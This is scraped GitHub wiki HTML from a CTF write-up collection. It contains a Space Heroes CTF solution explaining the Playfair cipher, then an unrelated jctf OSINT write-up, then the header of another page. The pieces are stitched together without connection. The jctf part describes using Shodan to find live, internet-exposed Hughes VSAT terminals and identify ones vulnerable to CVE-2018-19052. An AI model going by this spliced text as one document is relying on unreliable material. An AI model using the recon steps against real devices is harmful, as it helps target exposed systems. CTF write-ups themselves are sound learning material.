d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> Description Files Solution Recon Explanation Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>A space pirate was able to infiltrate the Galactic Federation HQ and plant a virus that's locked everyone out! Whenever they boot their machines, all that they see is this strange grid. Whoever this space pirate is, he sure doesn't play fair.<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h2>CryptoGrid.pngenc.txt<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="UIKOTHNVGELBKCRNPDDN">UIKOTHNVGELBKCRNPDDN</div><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>I didn't notice it right away but after I looked at the challenge description I noticed this : "...he sure doesn't play fair", that's a clear sign to the play fair cipher<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Explanation</h2>The play fair cipher is a cipher that relies on a grid to encrypt the message neededLet's say our key is "playfair example", so we need to translate it into a 5 x 5 grid. Remember that we cannot have any repeating letters, and once we finish our key we must complete the rest of the alphabet.Now let's take the plaintext "hide the gold in the tree stump". In order to encrypt the text, we split it into two letter segments where "X" is used a filler to keep the pairs consistent [HI DE TH EG OL DI NT HE TR EE ST UM PX]. Now we find each pair on the 5 x 5 grid.If they create a box, match the opposing letters together. So "HI" becomes "BM".If they create a vertical segment, add each character below to encrypt and each character above to decrypt. So "DE" becomes "OD".If they create a horizontal segment, add each character to the right to encrypt and each character to the left to decrypt. So "EX" becomes "XM".<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>Perfect ! now we know exactly what to do, given an encrypted flag at the bottom of the grid and in the text file we follow exactly what was explained above and voila!<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>shctf{the_PRophecY_has_spoken} A space pirate was able to infiltrate the Galactic Federation HQ and plant a virus that's locked everyone out! Whenever they boot their machines, all that they see is this strange grid. Whoever this space pirate is, he sure doesn't play fair. The play fair cipher is a cipher that relies on a grid to encrypt the message needed Let's say our key is "playfair example", so we need to translate it into a 5 x 5 grid. Remember that we cannot have any repeating letters, and once we finish our key we must complete the rest of the alphabet. Now let's take the plaintext "hide the gold in the tree stump". In order to encrypt the text, we split it into two letter segments where "X" is used a filler to keep the pairs consistent [HI DE TH EG OL DI NT HE TR EE ST UM PX]. Now we find each pair on the 5 x 5 grid. If they create a box, match the opposing letters together. So "HI" becomes "BM". If they create a vertical segment, add each character below to encrypt and each character above to decrypt. So "DE" becomes "OD". If they create a horizontal segment, add each character to the right to encrypt and each character to the left to decrypt. So "EX" becomes "XM". Perfect ! now we know exactly what to do, given an encrypted flag at the bottom of the grid and in the text file we follow exactly what was explained above and voila! shctf{the_PRophecY_has_spoken} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
First, do a Google search for "Very-small-aperture terminal" (from the hint) which leads to a Wikipedia article and the acronym "VSAT". Next, search "VSAT" on Shodan and find lots of results for `Hughes Network Systems Multimedia VSAT`. *Optional: Narrow search by "port:161" (SNMP). You may need a Shodan account to do this.* Finally, click on the IP address for each result and find one that has "Vulnerabilities" listed on the left. In details for many of the `Hughes Network Systems Multimedia VSAT`, find under 'Vulnerabilities': **CVE-2018-19052** Flag: jctf{CVE-2018-19052}
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>Space Heroes CTF : Invisible Stargate · 